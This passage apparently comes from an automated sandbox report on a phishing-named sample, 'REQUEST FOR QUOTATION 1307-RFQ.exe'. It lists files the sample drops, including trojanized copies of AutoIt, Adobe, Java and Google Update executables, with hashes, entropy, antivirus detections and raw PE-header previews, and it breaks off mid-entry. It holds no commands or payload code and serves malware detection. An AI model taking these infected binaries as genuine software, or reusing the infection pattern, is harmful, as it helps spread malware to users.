Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."....."."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.56162154618784
Encrypted:	false
SSDEEP:	49152:lfYP1JsEDkSR7Xgo4TiRPnLWvJpJLeQVPyzc+E7xQ2l:1YPBR7Xn4TiRCvJp1vcbE7xQ2l
MD5:	DB11D7715663EAD96782BB1AF10CD71C
SHA1:	9FB0C684FFE80A503A3B32A20F9EB6AA155C1FA3
SHA-256:	988342F5ACB473092DF6EB95AA1A76D531B0966D1D640B714B1F87C06193DFDC
SHA-512:	D145DA4F5D138848CBCBE5B81C017F9F1905806C218FC198F04EFF5BF3DBF3659F50B98BF35A449F191ECDAC5493B0F7FC5EE44383C4A6FEF5C073667127CADE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......v$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1351680
Entropy (8bit):	4.7886467195236655
Encrypted:	false
SSDEEP:	24576:pYUcknQGJ0eeQ2yPyzc+E7xonyVGc/dT5N:pZcknnJLeQVPyzc+E7xQ2l
MD5:	94D70456805CF6A086FF9DF8A5F2A7CD
SHA1:	4DB02D17F4B1B37C30DB2E4A4DE128B07E694FC8
SHA-256:	0988FB9FBDA3D1BAD61BA407710B9B0816DEC6CEB16A9DD12E5775D58CA9CF8A
SHA-512:	D297B8F3CD9DDCD47FC3B95504C5FCDD956E346936ED8B6E8D4560559CAD6100B999A4899C371A9E0048F8889E3D0B8FB9ED423FBFC077085ECD4BF71F181F5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................................................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.159691591761195
Encrypted:	false
SSDEEP:	49152:456AqSPyC+NltpScpzbtvpJoMQSq/jrQaSFJLeQVPyzc+E7xQ2l:LSktbpn1vcbE7xQ2l
MD5:	84C118D36183CC19075010547994AED4
SHA1:	DD35DF8F823304A14D761F21366396B0B759ADA4
SHA-256:	76D27D88071FF9BD937EA75FCB86838BE8FA501FB5679A701E05C2D83C80E76C
SHA-512:	F3FCB9BC32118A38D379CDAEADEB060150D395B35D6EB819CA894AC87158892036ADEAF1C21FD8AF68855AAE622D38A4D9BB71B8FD3E16D3F59CA1770BAD4399
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................j..... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.089750757390661
Encrypted:	false
SSDEEP:	49152:fGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxL+JLeQVPyzc+E7xQ2l:n4OEtwiICvYM3fe1vcbE7xQ2l
MD5:	8243DFC323541E76C223E9F601027116
SHA1:	398D1CCF4DFAEE841DBB5BBF57DF2686E37F6910
SHA-256:	B55848DF229D036BFE26866479635C6175479ED8E40420672667A5B69BE6C5E7
SHA-512:	E78792B61CE3BDB361F0C034F497640670B73D918770DB7769FFFB3630720D5E2471F921758E617A4F8C7C0DBAEFE11FAE7DE515CF8EBA9FF56A6F49027380BD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1592320
Entropy (8bit):	5.198498911798274
Encrypted:	false
SSDEEP:	24576:bAMvR+3kMbVjh6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:8E+lbVjhtJLeQVPyzc+E7xQ2l
MD5:	0DFDA19C79E3F34F8662777C221B6724
SHA1:	D2220FD9990AFBA9AD496EEA2D6D5577EBACBF76
SHA-256:	C8CE2666B7B2626ED14B72344362D6F7772778212D0F132E9690FE67810E4C4C
SHA-512:	407D00292F7390EE57FAE7E3DD81CAB29F49213F9B68D4CB7F632F3F2AD0237BD023CE37DA04E9B698D7F4597D1ACF44B10F6860D7589FEF8F065B247E6E8955
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@...........................".....I........................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1396736
Entropy (8bit):	4.946514465567763
Encrypted:	false
SSDEEP:	24576:nxGBcmlOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:xGy+hJLeQVPyzc+E7xQ2l
MD5:	56CC9A6FF09CF87495300EA7EEC67B33
SHA1:	4D9D2B02942C84FFEA9946F3AFD4EABE58FC320C
SHA-256:	0B98E8AF2D15A3642010B71EE28355E6DC8E2367AA2198D7C957844E165EF14E
SHA-512:	9ACA563D19D08DA458C9C883FE72888BC28307F9662EBE64D53C3B7D61A70E76C66BF861447CDD52B7FC41E26D3CE7472D530E83609BC4F6B011B45716E26BD0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................V......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1751040
Entropy (8bit):	5.41817518973157
Encrypted:	false
SSDEEP:	24576:l0vHyTLj8trn3wsgGJ0eeQ2yPyzc+E7xonyVGc/dT5N:IWj4rgsXJLeQVPyzc+E7xQ2l
MD5:	1E45B63BBC764DEDED9958639B575329
SHA1:	9FFA795BD8292F20F6C17EE22E4CA148F3F9F22D
SHA-256:	EEFD0DA3D7480B3511956D84C0B3BA7317A3FE5B5A979EECE05DEDE2CBADFBE2
SHA-512:	95B39136936FA77E932E96E404B340D2543BA6B8DEB57E0E9222DB64D77229D0E87BBD271916C84F1147F307E18056993406D60311935B850B92797113CD108D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@...........................$.....>.......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc... ....... ..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.271803891271068
Encrypted:	false
SSDEEP:	49152:k4ijwGJra0uAUfkVy7/ZuJLeQVPyzc+E7xQ2l:kNjwGJrakUQyc1vcbE7xQ2l
MD5:	32F2389D3F30D1518B8818E5039A5FB8
SHA1:	2060272E9560339BD0C4AD5B62A7753C332DE7E8
SHA-256:	DE0074C899DF9CDF200C99A93F403A9673554F2FBDCF92F8E24811F71794B4C9
SHA-512:	DD91A7FFA18A5C2ACBA804EEE91E0AA0500F0267C1DB411F596AA767E52F611168DCDB913543FCD7D9DF3F95488C8AECD17C3AA4C9816E9CB1839C7B8AFCA458
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.439021963190199
Encrypted:	false
SSDEEP:	24576:oeR0gB6axoCxyR6RLQRF/TzJqe58BimSGJ0eeQ2yPyzc+E7xonyVGc/dT5N:0gHxWR6uBTzge5Mim1JLeQVPyzc+E7xX
MD5:	9A22EA1274998899F1B72C21BE5216B0
SHA1:	F0F3D20AD4E4758A79F5A01D30E33BD1CFD36C5D
SHA-256:	E6AB35D44555185FB079C3154BC0A84428DD83F375D0EA2F98073EC977B45F02
SHA-512:	228DD1E6046F3A8B880C328FC1C9835A6F14C693A5F82A541FF5A907C05D686DDF5F89E2B8D43D77461AEEF8503C5E2A44D91DCB6064A25D1F9AD46135B032E5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......";......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1481728
Entropy (8bit):	5.127063762940034
Encrypted:	false
SSDEEP:	24576:TpwOtO7wGJ0eeQ2yPyzc+E7xonyVGc/dT5N:TmOtmHJLeQVPyzc+E7xQ2l
MD5:	B1FE490DDE2A96BDC5B0DCC7DC6D3640
SHA1:	278B707C4A91EF06322713CCA2CA70942C6D3285
SHA-256:	56C91851B237003497B64D4AAFEF39EC7398AF5A8C703FE00A3A530EE276412A
SHA-512:	160D40FA6F4AB0E2D4AB8D4583DD3B6EF6ACDB586B8B64909F5A22BC0E053544384C162D7145BADFCD43695024E45859E1BF4820C6A94CA88DD30AD3AFD637E2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@........................... .....L........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1481728
Entropy (8bit):	5.127773715232804
Encrypted:	false
SSDEEP:	24576:2KU/h/4KtGJ0eeQ2yPyzc+E7xonyVGc/dT5N:2r/VYJLeQVPyzc+E7xQ2l
MD5:	B8EEE92BB1C3DB5D847C1A0ED9E80487
SHA1:	01BDC7D78DE2ABBD0B905BFC33A0FABF49718A0B
SHA-256:	4BFA99921109690EE4B46E9491403FAFE660CB683BE894F8D2C48D2F7FFEFA23
SHA-512:	AF630F42EE2958688AACCF7CB9FA6822113C3FEFBE68A7BB8CD9D2D9BBA8A7F381F10A74589A2B12F121C2C2D26BDA561B659EE8D4AA6E9A8A5F7B20B1ECB9E1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@........................... .....:g.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1620480
Entropy (8bit):	5.1912702514724245
Encrypted:	false
SSDEEP:	24576:Ax7YiBLZ05jNTmJWExkGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AxUiHIjNg7JLeQVPyzc+E7xQ2l
MD5:	325BD3DC7963260605C590A1F7BDEEAB
SHA1:	B0E4FE16672C92277381300B46BFCBFADD853630
SHA-256:	9F53FF47933B9192DAE985372E6AE292CF7DBCDCC218FD65AAF55650658C0409
SHA-512:	1D8612FB89801BCAAA62FEE131E742A03B1DD5380D100CC48AC9AE495292411878AF471839BAD2730C3A65378F4BBD86DF919C93555BC9AAC1DA7B37283D1832
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................0$......+..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1525760
Entropy (8bit):	5.156197933912794
Encrypted:	false
SSDEEP:	24576:SlnRkld6fgJcEwix6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:GokfgJcEwCtJLeQVPyzc+E7xQ2l
MD5:	A61047A21719D5B2A0320892F25F383A
SHA1:	DBB6C3E04F9CE9B07D2275F1F67662916233BE37
SHA-256:	AE7E17A10249B1C4577983AC34D25E4B1C775818AFD36330491AE5F3BEA3AF0F
SHA-512:	849A68C8B3F5A9CD08F395DF4D3310BEA3E54C2787A42F4C885173B37272F3AB940467DA2BCF4DDA86AE8B93DAFFABF373A13D35DF41B08EC03CF5131042D8CC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................!.............................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1628672
Entropy (8bit):	5.207172499811455
Encrypted:	false
SSDEEP:	24576:tWR5k8hb0Haw+xqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:tWLk8SHawm9JLeQVPyzc+E7xQ2l
MD5:	8DD8A00A6E4F1339FD74E8C63005B119
SHA1:	35AF4C492AB04AB5F7C4F7E26193EB643673BA4F
SHA-256:	8FB200BF65902D6B3724D9FD1E51F2844CAD7259B7FCF81E25C45DB0B33C578F
SHA-512:	056B94F40CD8736F706BB1EBB3A6F515A8EEF4EE2B15F43CDD7F7D88A1DA84F5E34124F87ED2AB2282D39F8D38155C5135A62EEC7371B020417D9518CF45B650
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.............................P#........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc.......`......................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	4.835909183096476
Encrypted:	false
SSDEEP:	24576:PkCKAB2GJ0eeQ2yPyzc+E7xonyVGc/dT5N:PxKkZJLeQVPyzc+E7xQ2l
MD5:	D4457BAB67C01CECF69E18D7538C7C8D
SHA1:	F6D6AA413849E61843801155468591B75B1608FA
SHA-256:	110FF8C18C1F360C6961DBAB6E234AD376B39775521C24C87344B90011078779
SHA-512:	9ECB1F5401B6F2A1799B0A31CA7A747F09126A53EB37C4F00F9ADD778F0C43E45FE2107A75826D1E3863863B348D6F9A8F3BB0D2C8146BC1A900E7A013469473
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@..........................p......9.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...............@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1334784
Entropy (8bit):	4.820873280392928
Encrypted:	false
SSDEEP:	24576:1jNWBP/GJ0eeQ2yPyzc+E7xonyVGc/dT5N:9Nm2JLeQVPyzc+E7xQ2l
MD5:	3764FD711B116F8E76527A3DD07D9406
SHA1:	A3EE0F5060F906B7E4BA8B90F99E27551486674B
SHA-256:	9A3E6C185DE7E5DA6568DE77633FA8A4109DEEA0FC0942E4212AA4938D9D007A
SHA-512:	518D6D304B20D97CF7952FDEE0F2ACAA0410891068EB4B384327138FBCD4CE9074DCA1F3B9D92357BB22B936A4ECDD09DAC8FB28E9487F6D792E66D7FA8C675E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................f7.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1409024
Entropy (8bit):	4.913947460705735
Encrypted:	false
SSDEEP:	24576:DijRyhdsRr1GJ0eeQ2yPyzc+E7xonyVGc/dT5N:DijsoRQJLeQVPyzc+E7xQ2l
MD5:	C327B7CB7819C2CA5B692546DB530FED
SHA1:	EA1AC523260ABF03A8382B4F4BF13CC4740763EF
SHA-256:	41BC43E4B2EACF801FA10B4E5E3E7EEA4F5535D97566EC0418B3043C6CB4FADB
SHA-512:	2911194C17176D50EDA3A3841CEA0529E3E319DE32B8F59CF6D1B0397C76E70E30642CD422D48805D832181947E8A5EF2C822AAA6B1DA3D59F5C150D26DBBB54
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................. ........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc....... ......................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1448960
Entropy (8bit):	5.028601533678831
Encrypted:	false
SSDEEP:	24576:i16DmRF+wpx/QafMGJ0eeQ2yPyzc+E7xonyVGc/dT5N:tmRF+wn/JfTJLeQVPyzc+E7xQ2l
MD5:	B684C0F549854079171954A8CEDB7193
SHA1:	7667A7390D0CB9F4B892AC3BAD8AF8EFF650C413
SHA-256:	BD5BD3EBC4D499D099124F5C0DEEF6E9CE4DF7A457289414676F27C0A1E63E11
SHA-512:	5DDFD8548A9B4495D166C0028DDE2BF78FAE25E777F7D6828035481069D2F918F4A29515DD1481B1EE67017F8032DF7CB0E6EC49B40FF6001098BB877C740C22
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..........................p ......................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1334784
Entropy (8bit):	4.820847669019373
Encrypted:	false
SSDEEP:	24576:6E21BPqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:b2b1JLeQVPyzc+E7xQ2l
MD5:	487D180F00FA37D5D4FAA2BF1C2A1675
SHA1:	3BE46834AB10319938606CD6355EBFF078536154
SHA-256:	E9585E8243E8B131872B1F7AAD1AE37E271FFAEE07E33F38322C10BCDA6D147B
SHA-512:	6A54CCE556192D967166302C62768FC35C1826749E57290D55785C48CB4C88D366D2D7A43385B6E2CC2CF1611F0D46991519137182EBF81049D1830326239E33
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................0t.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
